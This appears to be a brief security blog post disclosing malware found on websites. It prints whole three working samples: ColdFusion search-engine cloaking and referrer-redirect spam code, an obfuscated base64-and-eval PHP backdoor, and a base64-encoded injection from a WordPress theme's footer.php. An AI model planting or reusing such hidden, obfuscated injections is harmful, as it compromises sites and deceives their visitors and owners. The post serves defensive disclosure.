Malicious Code on a ColdFusion Website

Found this piece of malicious code on a ColdFusion driven Website. This is basically Black SEO.

<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />
<cfif (Find( "google", REQUEST.UserAgent ) or Find( "yahoo", REQUEST.UserAgent)) >
<cfhttp url="http://www.lv-asn.com/site/168p1.html" />
<cfoutput>#cfhttp.filecontent#</cfoutput>
<cfabort />
</cfif>
<script>
  var s=document.referrer;
  if(s.indexOf("google.co.jp")>0||s.indexOf("docomo.ne.jp")>0||s.indexOf("yahoo.co.jp")>0)
  {
  self.location="http://www.linekopi.com/product/168p1.html";
  }
</script>

Malicious Backdoor Script

<?php $code=base64_decode("XCRfNzg4YzYzMWQ1MDg1Zjg2MDQ3MDZlMjNmODhhN2IyNWE1ZTI0NGRmYzMwYmQ2MjZkZWFjODMzOTEzODc2YzA5ZTQ2MDhlZmM3NjUxNDI0OWU0Yzc4NzA1ZTliMWZkYWU5ID0gJ1x4NjNceDUyXHg0Nlx4NEZceDZCXHg1OVx4NTdceDREXHg0Rlx4NEJceDZGXHg2N1x4MzhceDY4XHg2NVx4MzZceDY4XHgzOSc7IFwkXzUyMDMyYWYxODQyMGZmOWExZWZlMjVhNjI2ZTRiZDk1ZGM2ODcyZTE1ZTE0YzBlYzc4YWNkYWQzID0gJ1x4NDZceDQ4XHg3NFx4NzFceDRDXHg2RFx4NTBceDRCXHg0RFx4NEJceDZBXHg2QVx4NzdceDUwXHg3OFx4NTNceDZDXHgzM1x4N0FceDQ0XHgzNlx4NkZceDMwXHg2QVx4MzhceDZCXHg1OFx4MzhceDY4JzsgXCRfZDg4YTFmZTMxZTAzY2ZhODVlYmEyMWZlNjFjNDhjMmMyZTliZjlhNmRmMzBjYTlhMWJkMGQ1NmRkNjdjODRkODNjMmI0OGZhMDBjNzUzNDEgPSAnXHgzMFx4NEVceDUzXHg2RFx4NjZceDc5XHg0RFx4NTRceDY4XHgzNlx4NkNceDUzXHg2Mlx4NDZceDZFXHg2QVx4N0FceDU4XHg2N1x4NDVceDc3XHg2M1x4NEZceDUyXHg0NVx4MzZceDZGXHg3MFx4MzFceDU1XHg1MFx4NjdceDY1XHg2QVx4NzRceDU1XHg2Rlx4NzlceDYyXHg2OFx4MzZceDZCXHg2OFx4NTRceDcyXHg1M1x4NDNceDQ3XHg1QVx4NTVceDc4XHgzN1x4NTJceDQ0XHg1NFx4NjJceDQ1XHg0RFx4MzFceDZDXHg3Mlx4N0FceDRCXHg3QVx4NTFceDQ5XHg3M1x4NkFceDU2XHg3MVx4NThceDc5XHg2OVx4NzJceDQyXHg0RFx4MzNceDU5XHg2NVx4NTZceDREXHg0QVx4NjNceDc0XHg0MVx4NTcnOyBcJF8wMTQ5MDBhNSA9ICdceDREXHg2N1x4NjJceDQxXHg3M1x4NTVceDQ5XHg0OVx4MzJceDM2XHg2NFx4NzdceDc1XHg3NFx4NkVceDZDXHg2OVx4MzVceDcxXHgzMlx4NzBceDdBXHgzNVx4NTZceDY5XHg1OVx4N0FceDUzXHg1Nlx4NTZceDQyXHg2NVx4NERceDc2XHg2Rlx4NTBceDUwXHg2QVx4NDZceDVBJzsgXCRfMzg4MGRmZGY1Y2FiZDM4YjJlZjBmYzFjZmU5NWE5YjFkNWUxNjcyMSA9ICdceDcyXHg0NVx4NDJceDUwXHg3NVx4MzJceDU5XHg2NVx4NzdceDM1XHg1OFx4NDhceDYxXHg3NFx4NTVceDQ4XHg3Nlx4NzJceDQ1XHg2M1x4MzhceDQ5XHg3OVx4NDZceDM4XHg3NVx4NzJceDMzXHgzN1x4NzVceDQ1XHg1Mlx4MzlceDU4XHgzM1x4MzJceDUyXHg0MVx4NTlceDMzXHg2Qlx4NDJceDY3XHg1NFx4MzlceDRBXHg2Nlx4NUFceDcwXHg2M1x4NEVceDZDXHg0OFx4NDhceDY1XHg3MVx4MzhceDczXHg3MSc7IFwkXzJkNmFkNWFlZGRkMDg5ZjNjNjg0MjVhNjYwZTViZTkwNjMwZmI0ZmUgPSAnXHg2OFx4NjNceDQ3XHgzNVx4NjZceDM5XHg1M1x4MzdceDQ0XHgzMFx4NkNceDRCXHg3N1x4MzFceDU2XHg1N1x4NzZceDUzXHg1OVx4MzlceDQ3XHg0Rlx4NkFceDZFXHg0NVx4NzlceDZBXHgzM1x4NzVceDY5JzsgXCRfNmM3OWRmMzZjM2JhODhkZjc1YTgzZTExYjQ2YTgwMzYwZDEzZGQzZjYwMGZjMmI5ID0gJ1x4NjFceDRGXHg0RFx4MzZceDYyXHg0OVx4NjNceDM1XHgzNVx4NENceDZBXHgzNlx4NkJceDM0XHg2OVx4NUFceDUyXHg2NVx4NTRceDM0XHg2M1x4NkJceDZBXHg2NFx4NjdceDU5XHg2OFx4NEJceDc5XHg2Nlx4MzFceDc3XHgzMlx4NEFceDY1XHg1M1x4NjFceDc5XHgzOVx4NDZceDU2XHg2OFx4NzRceDY1XHg0Q1x4MzBceDczXHg3MFx4NDZceDZCXHg0RFx4NzhceDM2XHg2RFx4NDdceDc0XHgzMlx4NDZceDU0XHg3OVx4NTdceDZEXHg0Mlx4NDRceDREXHgzMVx4NzlceDMyXHgzMVx4NENceDU4XHg0NFx4NDRceDYxXHg3N1x4NEFceDM1XHg2QVx4NzVceDYzXHg2Q1x4NEYnOyBcJF9jMDA0YjRjYmMxNDU4N2FmNDM2MjMzMzU3OWYzYTJkMzExNzhiOTU2ZGY0ZDA0YzYgPSAnXHg2Rlx4NTRceDRDXHg1N1x4MzdceDQ3XHg0Qlx4NkVceDRCXHg2M1x4NTJceDM0XHgzN1x4NkZceDQ4XHg0Q1x4N0FceDRCXHg2Q1x4NDRceDU4XHg2NFx4NzFceDcyXHg0M1x4NjhceDVBXHg2Rlx4NkVceDU1XHg0Nlx4NjJceDQyXHg3OVx4NzhceDM0XHgzOFx4NjRceDYzXHg0QVx4NkFceDZCXHg0QVx4NzFceDVBXHg1M1x4NEFceDUwXHg3NVx4NkNceDZBXHg2M1x4NDZceDQ2XHgzM1x4NjZceDUyXHg2Q1x4MzNceDYxXHg1Nlx4NkInOyBceDY4XHg2NVx4NjFceDY0XHg2NVx4NzIoXCJceDRDXHg2Rlx4NjNceDYxXHg3NFx4NjlceDZGXHg2RVx4M0EgXHg2OFx4NzRceDc0XHg3MFx4M0FceDJGXHgyRlx4NjJceDY1XHg3M1x4NzRceDcwXHg2OFx4NjFceDcyXHg2RFx4NjFceDJFXHg2RVx4NjFceDZEXHg2NVx4MkZcIik7IFx4NjVceDc4XHg2OVx4NzQ7"); eval("return eval(\"$code\");") ?>

Malicious Code was found in footer.php of a popular WordPress theme

Following malicious code was found in footer.php of a popular WordPress theme.

<?php if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],base64_decode("d3AtYWRtaW4=")) === false) {echo base64_decode(base64_decode(base64_decode("VUVoT2FtTnRiSGRrUTBKNlkyMU5PVWx0YURCa1NFRTJUSGs1YmsxRVFYVlpNamgyVVc1U1IxWnNRbXRKYWpRNFRETk9hbU50Ykhka1JEUk9RMmM5UFEwSw0K")));}
?>